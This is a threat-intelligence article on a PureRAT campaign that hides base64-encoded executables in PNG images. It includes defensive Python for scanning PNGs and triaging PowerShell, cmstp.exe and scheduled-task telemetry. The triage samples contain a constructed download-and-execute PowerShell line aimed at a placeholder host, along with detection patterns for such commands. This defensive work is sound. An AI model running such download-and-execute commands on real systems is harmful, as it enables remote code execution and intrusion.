Multi-stage PureRAT Campaign - Fileless Execution Using PNGs

A new malware campaign uses PNG images to carry a base64-encoded payload that is decoded and run in memory, delivering PureRAT without ever dropping the executable to disk. Organizations should watch for suspicious PowerShell activity and unfamiliar Task Scheduler jobs; the on-disk parts of the chain (the shortcut, the script and the task) are where this campaign is still visible.

Category: Malware & Ransomware | Severity: HIGH

Original Reporting: SCSC Media

AI Summary (CyberPings AI, reviewed by Rohit Rana)

🎯 Basically, hackers are hiding malware inside image files and running it straight from memory, so very little of it ever touches the disk.

What Happened

A recent report by GBHackers News describes a multi-stage PureRAT campaign that uses ordinary PNG images as carriers for a base64-encoded payload, so the final stage is decoded and executed in memory rather than written to disk as an executable. This fits a broader trend in which attackers hide payloads inside file types that content filters, proxies and casual inspection treat as harmless.

How It Works

The chain begins with a malicious LNK (Windows shortcut) file that launches a concealed PowerShell command. That command downloads a heavily obfuscated VBS file built to slip past content inspection. When run, the VBS copies itself and registers a Task Scheduler job that re-launches it, so the infection survives a reboot.

The PowerShell loader then contacts hardcoded domains to fetch a PNG whose contents carry a base64-encoded portable executable (PE). A second PNG is downloaded the same way; its embedded data is decoded and loaded directly into memory, so the final payload never exists on disk as a PE file. Two caveats for defenders. First, "fileless" applies only to the last stage: the LNK, the copied VBS and the scheduled task are all on-disk artifacts that can be hunted. Second, in-memory loading defeats file-hash and on-access scanning of the payload, but the PowerShell commands are still visible to script block logging and the PNG retrievals are still visible on the network.
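The report does not say where inside the PNG the base64 text is placed. The following Python scanner, an added example rather than code from the campaign or from the original article, checks the two places a loader can stash text without breaking the image: bytes appended after the IEND chunk (ignored by every decoder) and tEXt/zTXt metadata chunks. It base64-decodes each candidate and reports it only if the result carries both the MZ and PE signatures. The sample PNGs and the inert "PE" stand-in are constructed inline; the assumption that the base64 is stored whole and unobfuscated is labelled in the code.

```python
import base64
import binascii
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def parse_png(data: bytes):
    """Walk the chunk list; return (chunks, bytes_after_IEND).
    A PNG decoder stops at IEND, so anything after it is invisible to image
    viewers but fully available to a loader that reads the file as raw bytes."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    chunks, pos = [], len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        pos += 12 + length          # length + type + data + CRC
        chunks.append((ctype, body))
        if ctype == b"IEND":
            break
    return chunks, data[pos:]


def looks_like_pe(blob: bytes) -> bool:
    """MZ at offset 0 and 'PE\\0\\0' at e_lfanew (the DWORD at 0x3C)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def base64_pe(candidate: bytes):
    """Return the decoded PE if the candidate is base64 text of a PE, else None."""
    text = b"".join(candidate.split())          # tolerate line-wrapped base64
    if len(text) < 64:
        return None
    try:
        decoded = base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None
    return decoded if looks_like_pe(decoded) else None


def find_embedded_pe(png: bytes):
    """Report (location, decoded_size) for every base64 PE found after IEND or
    inside a tEXt/zTXt chunk. Assumption (not stated by the report): the base64
    text is stored whole; a loader that splits or XORs it first needs a pre-step."""
    chunks, trailing = parse_png(png)
    hits = []
    pe = base64_pe(trailing)
    if pe:
        hits.append(("trailing", len(pe)))
    for ctype, body in chunks:
        if ctype not in (b"tEXt", b"zTXt"):
            continue
        keyword, _, text = body.partition(b"\0")
        if ctype == b"zTXt":                      # keyword \0 method \0 zlib(text)
            try:
                text = zlib.decompress(text[1:])
            except zlib.error:
                continue
        pe = base64_pe(text)
        if pe:
            hits.append((f"{ctype.decode()}:{keyword.decode('latin-1')}", len(pe)))
    return hits


# --- constructed samples (not files from the campaign) ----------------------
def _chunk(ctype: bytes, body: bytes) -> bytes:
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body)))


def build_png(extra_chunks=(), trailing: bytes = b"") -> bytes:
    """Minimal valid 1x1 RGB PNG, optionally with extra chunks and trailing bytes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\xff\x00\x00")   # filter byte + one red pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr)
    for ctype, body in extra_chunks:
        png += _chunk(ctype, body)
    return png + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + trailing


def fake_pe(size: int = 512) -> bytes:
    """Inert stand-in carrying only the MZ/PE signatures a loader checks; not executable."""
    buf = bytearray(size)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\0\0"
    return bytes(buf)


SAMPLE_CLEAN = build_png()
SAMPLE_TRAILING = build_png(trailing=base64.b64encode(fake_pe()))
SAMPLE_TEXT = build_png(extra_chunks=[(b"tEXt", b"Comment\0" + base64.b64encode(fake_pe()))])
```

Run `find_embedded_pe()` over PNGs pulled from proxy or sandbox captures; the clean sample returns an empty list, the other two return the location and decoded size. The same walk generalises to other metadata chunks, and a loader that stores the payload after a custom XOR would be caught by the same structure once the XOR is applied before `base64_pe`.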

Who's Being Targeted

The summary does not name specific sectors or regions. The tradecraft (an LNK lure, living-off-the-land PowerShell, and an in-memory final stage) is generic enough to work against any Windows environment, and it is chosen to evade defences that rely on scanning files on disk rather than on process lineage and script logging.

Signs of Infection

Organizations should be on the lookout for:

🔴 Suspicious LNK-initiated PowerShell activity (a PowerShell process spawned from a shortcut, typically with a hidden window or an encoded command)

🟡 Executions of cmstp.exe, a signed Windows component (the Connection Manager profile installer) that attackers commonly abuse to proxy execution and sidestep application control

🟠 Task Scheduler jobs that seem out of place, especially ones that launch a script host from a user-writable directory

How to Protect Yourself

To defend against this evolving threat, security teams should:

Detection

  1. Monitor PowerShell execution logs (script block and module logging) for hidden-window, encoded, or download-and-execute commands, and for PowerShell launched from explorer.exe via shortcuts
  2. Restrict LNK files arriving by email or download, and constrain PowerShell with application control (AppLocker or WDAC) and Constrained Language Mode, which limits what an ad-hoc loader can do with a decoded PE
  3. Review scheduled task creations (Security event 4698) and alert on actions that run wscript.exe, cscript.exe or powershell.exe from user-writable paths
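The indicators above (LNK-initiated PowerShell, cmstp.exe, out-of-place scheduled tasks) can be turned into triage logic. The Python below is an added example, not detection content from the original article or from any vendor; it applies those heuristics to process-creation events in the shape of Sysmon event 1 / Security 4688 and to exported scheduled tasks. It also decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE) so the hidden script is inspected, not just the outer command line. All events, paths, task names and the example.invalid URL are constructed samples.

```python
import base64
import re

# Heuristics: hidden-window / encoded / download-and-run PowerShell switches
SUSPICIOUS_PS = re.compile(
    r"(-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-e(?:p|xecutionpolicy)\s+bypass|"
    r"downloadstring|downloaddata|frombase64string|\biex\b|invoke-expression)", re.I)
ENC_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)   # -e/-ec/-enc/-EncodedCommand
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def first_token(cmdline: str) -> str:
    """First argument of a command line, honouring a quoted executable path."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def decode_encoded_command(cmdline: str):
    """PowerShell -EncodedCommand is base64 of UTF-16LE; return the plaintext or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_process(ev: dict) -> list:
    """ev = {'parent', 'image', 'cmdline'} as in a Sysmon event 1 / Security 4688."""
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    findings = []
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd) or ""
        text = cmd + " " + decoded             # inspect the decoded script as well
        # A shortcut opened from the desktop/Explorer runs its target as a child of explorer.exe
        if parent == "explorer.exe" and SUSPICIOUS_PS.search(text):
            findings.append("lnk_initiated_powershell")
        if re.search(r"\.png\b", decoded, re.I):
            findings.append("powershell_fetches_png")
    if image == "cmstp.exe":                   # signed LOLBin, rarely run by users
        findings.append("cmstp_execution")
    if image in ("wscript.exe", "cscript.exe") and USER_WRITABLE.search(cmd):
        findings.append("script_host_user_writable_path")
    return findings


def analyze_task(task: dict) -> list:
    """task = {'name', 'action'} as exported from the Task Scheduler."""
    exe = basename(first_token(task["action"]))
    if exe in SCRIPT_HOSTS and USER_WRITABLE.search(task["action"]):
        return ["suspicious_scheduled_task"]
    return []


def triage(events, tasks):
    report = []
    for ev in events:
        report += [(basename(ev["image"]), f) for f in analyze_process(ev)]
    for t in tasks:
        report += [(t["name"], f) for f in analyze_task(t)]
    return report


# --- constructed sample telemetry (not logs from the campaign) ----------------
_STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.png')"
_ENC = base64.b64encode(_STAGE1.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": f"powershell.exe -w hidden -nop -ep bypass -enc {_ENC}"},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //B "C:\Users\alice\AppData\Roaming\update.vbs"'},
    {"parent": PS, "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp.exe /ni /s C:\Users\alice\AppData\Local\Temp\x.inf"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe Get-ChildItem C:\Reports"},          # benign
    {"parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},                             # benign
]
SAMPLE_TASKS = [
    {"name": "OneDriveUpdateCheck",
     "action": r'"C:\Windows\System32\wscript.exe" //B "C:\Users\alice\AppData\Roaming\update.vbs"'},
    {"name": "NightlyBackup", "action": r'"C:\Program Files\Backup\backup.exe" /daily'},  # benign
]

if __name__ == "__main__":
    for who, finding in triage(SAMPLE_EVENTS, SAMPLE_TASKS):
        print(f"{who:22} {finding}")
```

The parent-is-explorer.exe check is a proxy for "started from a shortcut" (process telemetry does not record the LNK itself), so it only fires together with a suspicious switch or keyword; the benign interactive PowerShell sample and the service-host event produce nothing. Tune `USER_WRITABLE` to your own profile and software-deployment paths before running this at scale.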

Conclusion

The PureRAT campaign exemplifies the need for organizations to enhance their cybersecurity posture. By leveraging fileless techniques and common file types like PNGs, attackers are becoming increasingly sophisticated. Vigilance and proactive measures are essential to protect against such threats.

🔒 Pro Insight

The fileless final stage in this PureRAT campaign marks a shift toward stealthier tradecraft: file-hash and on-access scanning never see the decoded payload, so detection has to come from script block logging, process-lineage rules and memory inspection rather than from the file system.
